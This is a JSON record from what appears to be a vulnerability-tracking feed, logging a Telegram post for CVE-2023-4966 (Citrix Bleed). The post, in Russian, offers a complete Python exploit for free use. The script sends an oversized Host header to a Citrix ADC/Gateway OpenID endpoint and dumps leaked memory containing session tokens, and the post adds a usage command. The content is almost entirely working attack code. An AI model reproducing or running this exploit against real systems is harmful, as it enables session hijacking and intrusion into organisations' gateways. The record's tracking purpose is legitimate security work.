{"uuid": "04e6c835-65f3-49d3-89f5-8596d3dfac3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-4966", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3329", "content": "\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f Citrix Bleed: Leaking Session Tokens\nCVE-2023-4966\n\n\u041f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\u0441\u044c \u043d\u0430 \u0437\u0434\u043e\u0440\u043e\u0432\u044c\u0435 \ud83d\ude09\nExploit:\n#!/usr/bin/env python3\n\nimport sys\nimport requests\nimport urllib3\nimport argparse\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')\nargs = parser.parse_args()\n\nif args.target is None:\n    print('Target must be provided (e.g. --target 192.168.1.200)')\n    sys.exit(0)\n\nhostname = args.target\n\nif __name__ == \"__main__\":\n    headers = {\n        \"Host\": \"a\"*24576\n    }\n    r = requests.get(f\"https://{hostname}/oauth/idp/.well-known/openid-configuration\", headers=headers, verify=False,timeout=10)\n    if r.status_code == 200:\n        print(\"--- Dumped Memory ---\")\n        print(r.text[131050:])\n        print(\"---      End      ---\")\n    else:\n        print(\"Could not dump memory\")\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435:\npython exploit.py --target TARGET\n\n\ud83d\udcbb Github\n\n\u27a1\ufe0f \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435\n\n\ud83d\udcf9 YouTube PoC\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2023-10-25T07:46:11.000000Z"}